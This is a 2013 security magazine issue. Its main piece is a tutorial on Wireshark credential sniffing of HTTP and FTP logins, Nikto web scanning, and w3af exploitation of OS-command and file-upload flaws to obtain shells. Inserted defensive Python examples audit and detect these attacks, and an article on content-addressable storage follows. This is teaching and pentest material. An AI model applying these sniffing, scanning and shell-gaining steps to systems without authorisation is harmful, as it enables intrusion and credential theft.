24th of January 2013
Dear Readers,

After a long time of preparation we can proudly present to you the first Hack Insight issue. We decided to start it with Hacking Passwords because it is the base and first step for every IT security expert who is developing his hacking skills. Two articles have been prepared by Mr. Vikas Kumar, who is an experienced ethical hacker. He described in detail how to use Wireshark, Nikto and W3af. His research will help us to understand how to sniff network traffic and use the best-known network protocol analyzer, Wireshark. The second article concerns hacking methods. Mr. Kumar presented how a keylogger works and how to create your own phishing page. You should definitely check this section out and think of the danger during daily computer usage. The third article, written by Mr. Miroslav Ludvik and Mr. Radek Pilar, refers to Content Addressed Storage. In this issue we will be able to see an introduction to secure data archiving. In the second issue, as Miroslav promised, he will present content about the first vendor technology; you definitely cannot miss this article. This first publication wouldn't be possible without our magazine's friends who spent a lot of their working time to take care of this issue. Special thanks to Ms. Sheryl Checkman, Mr. Timothy Coleman and Mr. Ty Donaldson. We are grateful that thanks to your professional advice, attention to grammatical correctness and creation of the creative cover and essential images we can now read this magazine.

Enjoy the hacking!

Hack Insight Team
[Hack]in(Sight) Editorial Section
Authors: Vikas Kumar, Miroslav Ludvik, Radek Pilar.
Proof-reading: Timothy Coleman, Nina Takahashi, Agata Brzozowska.
DTP: Sheryl Checkman, Ty Donaldson.
Publisher: Hack Insight Press, Paweł Płocki, www.hackinsight.org
Editor in Chief: Paweł Płocki
All trade marks presented in the magazine were used only for informative purposes.
Table of Contents
www.hackinsight.org

• Page 6: Advanced Usage of Wireshark, Nikto and W3af. Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

• Page 24: CAS - introduction. Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

• Page 27: Data Stealing. Data Theft Prevention. Phishing. Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker it is a case of data theft. Even reading the mails of your colleague would also be taken as a crime in the eyes of the law. It is irrelevant whether you later used this data for misdeeds or not; what counts is that data that is not yours has been accessed without prior permission of its authorized user, who may also be its creator.
Advanced Usage of Wireshark, Nikto and W3af

I. Wireshark

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Figure 1. Image of Wireshark with logo

Wireshark, formerly known as Ethereal, is one of the most powerful tools in a network security analyst's toolkit. As a network packet analyzer, Wireshark can peer inside the network and examine the details of traffic at a variety of levels, ranging from connection-level information to the bits comprising a single packet. This flexibility and depth of inspection allows the valuable tool to analyze security events and troubleshoot network security device issues.

The Role of a Network Protocol Analyzer

Network protocol analyzers like Wireshark let us look at the behaviors of network protocols. This can be useful for three main reasons:

1. Observing the network traffic generated by protocols, services, applications etc. helps us gain a better understanding of how these various things work.
2. The ability to observe exactly what is happening over a network can also often help us gain a better understanding of a problem we are troubleshooting.
3. Finally, the ability to monitor network traffic can help us identify threats to or breaches of network security.

How to sniff network traffic and why sniff the network?

The phrase "sniff the network" may conjure Orwellian visions of a Big Brother network administrator reading people's private email messages. Before anyone uses Wireshark, an organization should ensure that it has a clearly defined privacy policy that spells out the rights of individuals using its network, grants permission to sniff traffic for security and troubleshooting issues, and states the organization's policy requirements for obtaining, analyzing and retaining network traffic dumps. Anyone who uses a tool like Wireshark without first obtaining the necessary permissions may quickly find themselves in hot water legally.

However, as a security professional, there are two important reasons to sniff network traffic. First, peering into the details of packets can prove invaluable when dissecting a network attack and designing countermeasures. For example, if a denial of service occurs, Wireshark can be used to identify the specific type of attack. The tool can then craft upstream firewall rules that block the unwanted traffic. The second major use of Wireshark is to troubleshoot security devices. Specifically, I regularly use it to troubleshoot firewall rules. If systems running Wireshark are connected to either side of a firewall, it's easy to see which packets successfully traverse the device and identify whether the firewall is the cause of connectivity problems.

That being said, it's important to remember that Wireshark can be used for good or for evil, as is the case with many security analyzers. In the hands of a network or security administrator it's a valuable troubleshooting tool. In the hands of someone with questionable ethics, however, it's a powerful eavesdropping tool that enables someone to view every packet that traverses the network.

Downloading & Installing Wireshark

If you don't already have Wireshark installed on your computer you can download it from the Wireshark website at http://www.wireshark.org.

Security Note: It is best practice to download software only from the official site of the developer. There are many other sites which offer Wireshark downloads; my advice is to avoid them, as you can't know whether the software you are downloading has been altered in a malicious way by the third-party site.

The installation is straightforward, and for most people you should be able to run the installer and simply click Next through the whole process.

Running a simple "packet capture"

Once Wireshark is installed, start it up and you'll be presented with the blank screen in which you select the interface on which you want to capture data packets, as shown below:

Figure 2. Available Interfaces

Figure 3. Interface Selection for capturing data packets.

Click the Start button next to the name of the interface on which you wish to capture traffic, and immediately you will see Wireshark filling up with traffic, as shown in the picture below.
Figure 4. Wireshark traffic

Interpreting the results

Each line in the top pane of the Wireshark window corresponds to a single packet seen on the network. The default display shows the time of the packet (relative to the initiation of the capture), the source and destination IP addresses, the protocol used and some information about the packet. You can drill down and obtain more information by clicking on a row. This causes the bottom two window panes to fill with information.

The middle pane contains drill-down details on the packet selected in the top frame. The "+" icons reveal varying levels of detail about each layer of information contained within the packet. In the example above, I've selected a DNS response packet. I've expanded the DNS response (application layer) section of the packet to show that the original was requesting a DNS resolution for www.cnn.com, and this response is informing us that the available IP addresses include 64.236.91.21. The bottom window pane shows the contents of the packet in both hexadecimal and ASCII representations.
Wireshark color codes

Color is your friend when analyzing packets with Wireshark. Notice in the example above that each row is color-coded. The darker blue rows correspond to DNS traffic, the lighter blue rows are UDP SNMP traffic, and the green rows signify HTTP traffic. Wireshark includes a complex color-coding scheme (which you can customize). The default settings appear below:

Figure 5. Wireshark color coding
Wireshark is already capturing data packets, so let's test it: ping any system in the network and Wireshark will capture the ICMP data packets:

Figure 6. Pinging from IP 192.168.152.130 to target system IP 192.168.152.128

Figure 7. ICMP data packet filtration with echo request & reply

With Wireshark still capturing data packets, let's test a login: suppose I log in to www.jammuclubjammu.com.

Figure 8. Putting credentials in login account
Filter data packets. For this tutorial I have used HTTP, as shown below. NOTE: there are many protocols you can use to filter data packets (e.g. FTP).

Figure 9. Finding HTTP data packets through filtration.

Now look for POST, select it, right-click (or go to the Analyze menu) and then select Follow TCP Stream.

Figure 10. Finding HTTP data packets through filtration.

You should now see this window; just scroll down until you see the username and password. As you can see, I managed to capture my username and password.

Figure 11. TCP Stream window will show credentials

FTP Data Packet Capturing with login Credentials
Now we are going to capture data packets of the FTP protocol, so we use a cmd prompt to log in to the FTP account of the jammuclubjammu.com web server.

Figure 12. FTP Login with cmd.

We have entered the credentials and, side by side, our Wireshark is capturing all the data packets.

Figure 13. Login into FTP account with credentials.

Now we will resolve the data packets of the FTP protocol, for which first of all we filter all FTP data packets, as shown below:

Figure 14. FTP data packet filtration.

Now we will resolve these data packets: right-click on an FTP data packet and click on Follow TCP Stream.

Figure 15. FTP data packet resolved and credentials in txt format.
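Both captures above (the HTTP form POST in Figure 11 and the FTP login in Figure 15) show the same finding: a password crossing the wire unencrypted, readable by anyone who can see the stream. The following is an added example, not part of the article, that automates what Follow TCP Stream shows by eye so that a defender can audit their own captures for this. Both stream texts are constructed; the host name, user name and passwords are placeholders, not captured data. The report masks the values, because the finding that matters is that a cleartext credential exchange happened, not the secret itself.

```python
"""Audit reassembled TCP streams for credentials sent in the clear.
Added example (not from the article); streams below are constructed."""
from urllib.parse import parse_qs

# Constructed: what Follow TCP Stream would show for a cleartext form login.
HTTP_STREAM = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: www.example-login.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 51\r\n"
    "\r\n"
    "username=demo_user&password=Hunter2%21&submit=Login"
)

# Constructed: an FTP control connection of the kind shown in Figure 15.
FTP_STREAM = (
    "220 FTP server ready\r\n"
    "USER demo_user\r\n"
    "331 Password required for demo_user\r\n"
    "PASS s3cret\r\n"
    "230 User demo_user logged in\r\n"
)

# Substrings that commonly mark a secret-bearing form field.
CREDENTIAL_HINTS = ("pass", "pwd", "secret", "token")


def mask(value: str) -> str:
    """Keep the first character so an analyst can correlate, hide the rest."""
    return value[:1] + "*" * (len(value) - 1) if value else ""


def audit_http_stream(stream: str) -> list:
    """Findings for secret-looking fields in a cleartext HTTP form POST body."""
    findings = []
    head, _, body = stream.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    if not request_line.upper().startswith("POST "):
        return findings
    if "application/x-www-form-urlencoded" not in head.lower():
        return findings  # JSON or multipart bodies would need their own parser
    user = None
    for name, values in parse_qs(body).items():
        lname = name.lower()
        if any(hint in lname for hint in CREDENTIAL_HINTS):
            findings.append({"protocol": "http", "field": name, "value": mask(values[0])})
        elif "user" in lname or "login" in lname:
            user = values[0]
    for finding in findings:
        finding["user"] = user
    return findings


def audit_ftp_stream(stream: str) -> list:
    """Findings for USER/PASS pairs on an FTP control connection."""
    findings, user = [], None
    for line in stream.splitlines():
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "USER":
            user = arg
        elif cmd.upper() == "PASS":
            findings.append({"protocol": "ftp", "field": "PASS", "value": mask(arg), "user": user})
    return findings


def audit(streams) -> list:
    """Run each stream through both auditors; a stream of another protocol yields nothing."""
    out = []
    for stream in streams:
        out.extend(audit_http_stream(stream))
        out.extend(audit_ftp_stream(stream))
    return out


if __name__ == "__main__":
    for f in audit([HTTP_STREAM, FTP_STREAM]):
        print(f"{f['protocol'].upper():5} user={f['user']!r} {f['field']}={f['value']} (cleartext)")
```

The remediation for both findings is the same one the article's screenshots argue for implicitly: put the login behind TLS (HTTPS, or FTPS/SFTP instead of FTP), after which Follow TCP Stream shows only ciphertext.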
Filtering Packets

If you're trying to inspect something specific, such as the traffic a program sends when phoning home, it helps to close down all other applications using the network so you can narrow down the traffic. Still, you'll likely have a large amount of packets to sift through. That's where Wireshark's filters come in. The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking Apply (or pressing Enter). For example, type "ip.src == 192.168.152.130" and you'll see only data packets with source IP 192.168.152.130. When you start typing, Wireshark will help you autocomplete your filter.

Figure 16. Data packet filtration of ip.src == 192.168.152.130

Next filter: "dns"

Figure 17. Data packet filtration of DNS
Inspecting Packets

Click a packet to select it and you can dig down to view its details.

Figure 18. Data Packet Inspecting

You can also create filters from here: just right-click one of the details and use the Apply as Filter submenu to create a filter based on it.

Figure 19. Apply as Filtration.

Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do with it. Professionals use it to debug network protocol implementations, examine security problems and inspect network protocol internals.
II. Nikto

Introduction

Nikto is an open source web server scanner "which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files or CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers." The good thing about Nikto is that it is easy to use and scans quickly. Nikto is coded in Perl and written by Chris Sullo and David Lodge. Not all checks are a big security problem, but most are, like XSS (Cross Site Scripting) vulnerabilities, phpMyAdmin logins, etc. Nikto alerts you and gives security tips in order to protect your website from various attacks.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system). Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

So if you are using BackTrack to practice pentesting then you needn't worry about installing Nikto, as it is already there in BackTrack (it's there even in BackTrack 4). But if you aren't using BackTrack, then you can download Nikto from the website http://www.cirt.net/nikto2. Make sure you have Perl installed because Nikto is a Perl script.

You can run Nikto in two ways:
1. Go to Applications > Backtrack > Vulnerability Assessment > Web Application Assessment > Web Vulnerabilities Scanner > Nikto
2. cd /pentest/web/nikto/

Simply:
root@bt:~# cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -H

Figure 20. Nikto Options of help

Figure 21. Nikto Options of help

If we give the command ./nikto.pl -Help or perl nikto.pl -Help then we get details of all the options. We are going to scan a target website, because we are pentesting it. So easy:
root@bt:/pentest/web/nikto# ./nikto.pl -host 10.x.x.52 -output kioptrix_80.txt
Figure 22. Nikto scanning target website

Figure 23. Nikto scanning result.

Now you will get an output file in txt format, which you can open for reading with:
root@bt:/pentest/web/nikto# cat kioptrix_80.txt

Figure 24. Nikto output file.

In order to run a simple vulnerability scan against a target you just have to specify a host address along with a port number. For example:
perl nikto.pl -h 10.10.15.27 -p 32333

Figure 25. Nikto scanning a web server based on port.
In the above command:
"-h" switch implies host address.
"-p" switch implies port number.

The above command runs a vulnerability scan against the host 10.10.15.27. But since we specified the port number as 32333, Nikto scans that particular port only. Now if you want the scan to include multiple ports you have to specify a port range:
perl nikto.pl -h 10.10.15.27 -p 1024-10000

What if you don't specify any port?
perl nikto.pl -h 10.10.15.27

Figure 25. Nikto scanning a web server without specifying port

In this case Nikto just scans port 80. Are these the only switches that Nikto has to offer (i.e. "-h" and "-p")? No, it offers a wide variety of switches. Just type perl nikto.pl to check the range of options Nikto offers.
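The article notes that Nikto "is fairly obvious in log files". The following added example (not from the article or the Nikto project) shows what that means from the web server's side: it reads combined-format access log lines and flags sources that either announce themselves with Nikto's default User-Agent or produce a burst of requests that mostly end in 404, which is how a file/CGI enumeration looks even when the User-Agent has been changed with the anti-IDS options mentioned above. All log lines are constructed, the IP addresses are documentation ranges, and the version number inside the User-Agent string is an assumption; only the "Nikto/" substring is relied on.

```python
"""Flag Nikto-style scans in web server access logs.
Added example (not from the article); all log lines are constructed."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shape of the User-Agent Nikto sends by default (version here is assumed).
NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
# Constructed: the same kind of scan with the User-Agent changed.
ALT_UA = "Mozilla/5.0 (compatible; scanner)"


def _line(ip, path, status, ua):
    return f'{ip} - - [24/Jan/2013:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 209 "-" "{ua}"'


# Constructed access log: a default Nikto run, a run with a changed UA, and a normal visitor.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "/", 200, NIKTO_UA)]
    + [_line("203.0.113.7", p, 404, NIKTO_UA) for p in
       ("/cgi-bin/test-cgi", "/admin/", "/phpmyadmin/", "/backup/", "/server-status", "/.htpasswd")]
    + [_line("203.0.113.9", "/", 200, ALT_UA)]
    + [_line("203.0.113.9", p, 404, ALT_UA) for p in ("/old/", "/test/", "/cgi-bin/", "/_vti_bin/")]
    + [_line("198.51.100.2", p, s, "Mozilla/5.0 (Windows NT 6.1)") for p, s in
       (("/index.html", 200), ("/style.css", 200), ("/logo.png", 200), ("/favicon.ico", 404))]
)


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            records.append(rec)
    return records


def flag_scanners(records, min_requests=5, not_found_ratio=0.6) -> dict:
    """Return {ip: [reasons]} for sources that look like a web vulnerability scan."""
    per_ip = defaultdict(lambda: {"total": 0, "not_found": 0, "nikto_ua": False})
    for r in records:
        s = per_ip[r["ip"]]
        s["total"] += 1
        s["not_found"] += r["status"] == 404
        s["nikto_ua"] |= "nikto/" in r["ua"].lower()
    flagged = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["nikto_ua"]:
            reasons.append("nikto-user-agent")
        # Enough requests to judge, and most of them for paths that do not exist.
        if s["total"] >= min_requests and s["not_found"] / s["total"] >= not_found_ratio:
            reasons.append("high-404-ratio")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_scanners(parse_log(SAMPLE_LOG)).items():
        print(ip, ", ".join(reasons))
```

The User-Agent match is cheap but trivially defeated; the 404-ratio heuristic survives a changed User-Agent, at the cost of needing a few requests before it fires, which is why the two are reported separately.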
Figure 26. Nikto scanning options for scanning target website to use.

III. W3af

Security is a key point for every effective business. Whether you are running your own website or your job is to manage the web application for your company, you have to do a little penetration testing to check the security of the web application. Nowadays exploits are available and updated on a daily basis for different web application services. While doing a penetration test a pen tester must consider these exploits for different vulnerabilities. Finding vulnerabilities is not enough; a pen-tester must check the parallel exploits that are publicly available for different services. w3af (Web Application Audit and Attack Framework) is a framework for auditing and exploitation of web applications. In this series of articles we will be looking at almost all the features that w3af has to offer and discuss how to use them for web application penetration testing. In the first part of this series we will be working with the w3af console and getting ourselves familiar with the commands. We will also be looking at the different types of plugins that w3af has to offer and discuss how to use them for optimal performance. W3af stands for web auditing and attack framework. I have heard some say that it is the Metasploit for web applications. W3af is basically a free, open source web application scanner. W3af has many plugins that are divided into attack, audit, exploit, discovery, evasion, brute force, mangle and a few others. The code is well commented and written in Python, so writing your own exploits and plugins should be trivial. Some of the major features of w3af are:
1. It has plugins that communicate with each other. For example, the discovery plugin in w3af looks for different URLs to test for vulnerabilities and passes them on to the audit plugin, which then uses these URLs to search for vulnerabilities.
2. It removes some of the headaches involved in manual web application testing through its Fuzzy and Manual request generator feature. It can also be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be performed using variable parameters.
3. It also has features to exploit the vulnerabilities that it finds.

Figure 27. W3af (Web Application Attack and Audit Framework)

The first step is to give the URL to w3af and scan it for XSS vulnerabilities. Open up the w3af GUI. Once it is open, on the left hand side, we can see an option to choose from various profiles.

Figure 28. W3af profile selection.

We can choose any profile from the list depending on our need, as well as the time available. These profiles already have configurations to use some specific plugins for a particular task. For example, if we look at the profile OWASP_TOP10, we will see that it uses several of the Audit, Grep and Discovery plugins to perform its tasks.

For the time being, we are going to use an Empty profile, as we just want to check a single URL for an XSS vulnerability. Note that this is usually not the way in which we will use the w3af framework. In a real world environment, we will choose some specific discovery plugins to find different URLs to check for injections, auth plugins to automatically log in to forms and crawl ahead, grep plugins to look for interesting information in the response, and audit plugins to scan for vulnerabilities in the found injection points. Type in the URL in the target field and choose the xss plugin from the audit plugins.

Figure 29. W3af Plug-ins selection for scanning target url

Figure 30. URL scanning

Once this is done, click on Start. This will start the scan on the given URL. As we can see from the output, it found an XSS vulnerability.
Figure 31. W3af scanning result

If you are interested in knowing what actually happened, go to the Results tab. Click on xss on the left side. On the right side, you can see a description of how the vulnerability was found. On the bottom right, you can also see the request and response which led to the identification of the vulnerability. It is a very good practice to look at the requests and responses sent through by w3af, as this lets us know what's going on under the hood.

Figure 32. W3af Vulnerability description

So basically what happened was that w3af sent JavaScript strings to every parameter in the URL, and then checked for those strings in the response. In case of stored XSS, w3af takes a note of the injected string and makes a request again to the URL looking for that string. If it finds that string, then a stored XSS has been identified.

Let's now use an OS commanding vulnerability to obtain a shell on the system. From the OS commanding section in the w3af test environment, choose a URL and give it as target to w3af. Under the audit plugins section, check the OS commanding plugin.

Figure 33. W3af OS Command for obtaining shell of target URL.
Figure 34. OS Command vulnerability output

Once this is done, click on Start to launch the vulnerability scan. As we can see from the output, w3af identified an OS commanding vulnerability.

w3af supports detection of both simple and blind OS commanding vulnerabilities. In simple OS commanding, it sends a simple command to every parameter and then looks for the response to that command in the output. In case of blind OS commanding, in which the response is not present in the output, it uses time delays to identify if a vulnerability is present. For example, if it sends a command which delays the response for some seconds, and we note a delay in the output, we can say that a blind OS commanding vulnerability is present. Again, in the results section, we can see the request and the response which led to identification of the vulnerability.
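The two audit checks described above share one pattern: inject a value into each parameter, then observe the response for its effect (the string echoed back for XSS, the command's output or a delay for OS commanding). The following added example, which is not w3af's code, shows that pattern for the XSS case against in-process mock handlers, so it needs no network or target. Each handler takes a dict of query parameters and returns an HTML body; the vulnerable handler, its output-encoded fix and the guestbook used for the stored-XSS case are all constructed here, and the probe is a random marker containing HTML metacharacters rather than any real payload. Seeing the hardened handler pass the same check is the point for the developer reading the w3af report.

```python
"""Reflected and stored XSS checks of the inject-and-observe kind w3af performs,
run against constructed mock handlers.  Added example, not w3af's code."""
import html
import secrets
from urllib.parse import parse_qs, urlsplit


def vulnerable_search(params: dict) -> str:
    """Echoes the query straight into the page: reflected XSS."""
    page = params.get("page", "1")
    page = page if page.isdigit() else "1"  # numeric field is validated, so it does not reflect
    return f"<h1>Results for {params.get('q', '')}</h1><p>page {page}</p>"


def hardened_search(params: dict) -> str:
    """Same page with output encoding; the browser sees text, not markup."""
    page = params.get("page", "1")
    page = page if page.isdigit() else "1"
    return f"<h1>Results for {html.escape(params.get('q', ''), quote=True)}</h1><p>page {page}</p>"


def make_guestbook(escape_output: bool):
    """Constructed two-step app: post() stores a comment, view() renders all of them."""
    comments = []

    def post(params):
        comments.append(params.get("comment", ""))
        return "<p>Thanks!</p>"

    def view(params):
        render = html.escape if escape_output else (lambda s: s)
        return "<ul>" + "".join(f"<li>{render(c)}</li>" for c in comments) + "</ul>"

    return post, view


def _marker() -> str:
    # Unique per probe, so a hit can only come from our own injection, and carrying
    # the metacharacters that must not survive unencoded.
    return f"<w3chk{secrets.token_hex(4)}>"


def reflected_xss_check(handler, url: str) -> list:
    """Names of query parameters whose value comes back in the response unencoded."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    base = {k: v[0] for k, v in query.items()}
    findings = []
    for name in base:
        marker = _marker()
        probe = dict(base, **{name: marker})   # one parameter at a time, others unchanged
        if marker in handler(probe):           # encoded output would read &lt;w3chk...&gt;
            findings.append(name)
    return findings


def stored_xss_check(post_handler, view_handler, field: str) -> bool:
    """Inject into a write endpoint, then re-request the page that renders the stored data."""
    marker = _marker()
    post_handler({field: marker})
    return marker in view_handler({})


if __name__ == "__main__":
    url = "http://app.example.test/search?q=shoes&page=2"
    print("vulnerable:", reflected_xss_check(vulnerable_search, url))
    print("hardened:  ", reflected_xss_check(hardened_search, url))
```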
w3af also allows us to exploit vulnerabilities. If we go under the Exploit section, we can see the identified vulnerability in the Vulnerabilities section. If we click on it, we can see that osCommandingShell in the Exploits section turns black. This is an indication that the vulnerability can be exploited using the osCommandingShell plugin in w3af. Right click on osCommandingShell and click on Exploit ALL vulns.
Figure 35. Vulnerability identification
Figure 36. W3af vulnerability exploitation.

Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We can see the list of shells on the right side. Note that it is not possible to get a shell in case of every vulnerability. Just double click on the shell and you are all set and ready to go.

Figure 37. Shell execution

Similarly, let's use a file upload vulnerability to get a shell. Give the vulnerable URL as a target to w3af. Make sure the fileUpload plugin is checked in the audit plugins list.

Figure 38. FileUpload Plug-ins list.

Also make sure to check the extensions option in the fileUpload plugin. Since in some cases the web application allows only some specific extensions, it would be favorable to add those extensions to the list as well.
Figure 39. Specifying extensions for web application

Click on Start. As we can see from the output, w3af identified a file upload vulnerability.

Figure 40. FileUpload vulnerability identification.

Click on the Results tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this by sending the file object in the uploadedfile parameter. It then looked for these files in common directories like uploads etc. If the file is found, then it can be said that an Insecure File Upload vulnerability exists. However, this is not always the case, as most web applications filter files based on their extension. To bypass this, w3af has templates for some of the most common file extensions. These templates have valid extensions but have a section that can be replaced with scripting code. The figure below shows the files with different extensions present in w3af.

Figure 41. FileUpload templates

If we open up any of these files with Kate, we can see the content inside it. As we can see from the figure below, the file template.png has a string of A's in its comment section. This string can actually be replaced by scripting code like PHP.

Figure 42. String replacement.

With all of these basics out of the way, let's exploit this vulnerability using the fileUploadShell plugin. You can also set the configuration of these plugins by right-clicking on them and clicking on Configure the plugin. As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the target machine.
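The template.png described above is the defender's lesson in this section: a file can be a perfectly valid PNG and still carry arbitrary text in an ancillary chunk (the comment holding the A's) or after the IEND marker, so checking the extension or the first few magic bytes proves nothing about what else is inside. The following added example (not from the article or w3af) walks the PNG chunk structure, verifies every CRC, reports text chunks and trailing bytes, and rebuilds the image from its critical chunks only, which is the usual sanitising step for an upload handler. The sample PNG is constructed here (a 1x1 grayscale image with a Comment chunk); nothing in it is w3af's template.

```python
"""Inspect an uploaded PNG for hidden text and re-emit only its critical chunks.
Added example (not from the article); the sample image is constructed."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CRITICAL = (b"IHDR", b"PLTE", b"IDAT", b"IEND")
TEXT_CHUNKS = (b"tEXt", b"zTXt", b"iTXt")


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk: length, type, body, CRC over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(comment: bytes) -> bytes:
    """Constructed 1x1 8-bit grayscale PNG carrying a tEXt 'Comment' chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type 0, ...
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one gray pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", b"Comment\x00" + comment)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def iter_chunks(data: bytes):
    """Yield (type, body) per chunk; raise ValueError on anything irregular."""
    if not data.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIG)
    while True:
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            raise ValueError("truncated chunk body")
        if struct.unpack(">I", crc_bytes)[0] != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r}")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            break
    if pos != len(data):
        raise ValueError("trailing data after IEND")  # a second classic hiding place


def text_chunks(data: bytes) -> list:
    """Bodies of all textual ancillary chunks (where template.png keeps its A's)."""
    return [body for ctype, body in iter_chunks(data) if ctype in TEXT_CHUNKS]


def is_clean_png(data: bytes) -> bool:
    """True only for a well-formed PNG with no text chunks and nothing after IEND."""
    try:
        return text_chunks(data) == []
    except ValueError:
        return False


def strip_to_critical(data: bytes) -> bytes:
    """Re-emit the image keeping only critical chunks; refuses malformed input."""
    return PNG_SIG + b"".join(_chunk(t, b) for t, b in iter_chunks(data) if t in CRITICAL)


if __name__ == "__main__":
    png = build_sample_png(b"A" * 64)
    print("text chunks before:", len(text_chunks(png)),
          "after:", len(text_chunks(strip_to_critical(png))))
```

Stripping metadata is only one layer: the file should also be stored outside the web root, under a server-chosen name, and served with a fixed image Content-Type, so that whatever survives in it is never executed or interpreted as script.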
Figure 43. Vulnerability exploitation.

Similarly, you can perform tests for many other exploits like Local File Inclusion, Remote File Inclusion, SQL Injection etc.
About the author

VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR was born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his group "hackers4u" on Facebook in the year 2010, and within two years he made his mark on the World Wide Web with good computer ethical hacking articles; he is going to launch a website on Cyber Security & Ethical Hacking and is working with the anti-hacking community "I-hackers4u". The 22-year-old has the capability to compete with the best people in the business called "Ethical Hacking".

Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran etc.

www.cyber-hunt.com
Blog: www.cyber-hunt2012.blogspot.com
LinkedIn Profile: https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro
Facebook: https://www.facebook.com/hackers4u
BackTrack Fan Club Page: https://www.facebook.com/pages/Cyber-HuntBackTrack-FanClub/395372283859684?ref=tn_tnmn
Facebook Page: https://www.facebook.com/vikas7852?ref=tn_tnmn
CAS – introduction

Abstract: Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS (Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then, there will be a few articles about existing solutions and finally, their comparison.

Typical filesystems use name and path to uniquely identify a stored object (which can be a file, directory, symlink, etc.). This approach has a few advantages, but also a few disadvantages that CAS systems aim to fix. CAS, as its name implies, identifies the object by its content. Of course, it wouldn't be practically feasible to use the whole content of the object; in that case, storing the file would be pointless. Instead, CAS systems use a cryptographic hash of the content. So, if we want to access the file with content "Balance for the year 2012", instead of the file:
/home/accountant/docs/balance2012.doc
or on Windows:
C:\Users\Accountant\Documents\balance2012.doc
we access the object identified by the string:
cd52089ea948bd42fece0ebba0c91b5ae68169e4
which is, in this example, the SHA-1 hash of its content. Because with that approach you'd lose some information (filename, author, creation date), the CAS system attaches metadata to objects.

The first CAS system ever was introduced in 2003 by the US company EMC under the name Centera, but it was immediately followed by similar products from other vendors like HP, Hitachi, Oracle/Sun, Dell and others. Today, CAS is used as a de-facto standard for long-term data archiving.

CAS-based solutions have several advantages. Since the system works with file hashes instead of filenames, it is much more difficult to tamper with data (even from the sysadmin's perspective): it is really easy to save a different file with the same name, but really difficult to save a different file with the same hash. And on the other side, two files with the same contents will have the same hash; therefore, there will be only one copy stored in the system. This effectively supersedes file-level deduplication: the non-existence of multiple copies of the same file is implied by the basic principles of the system itself.

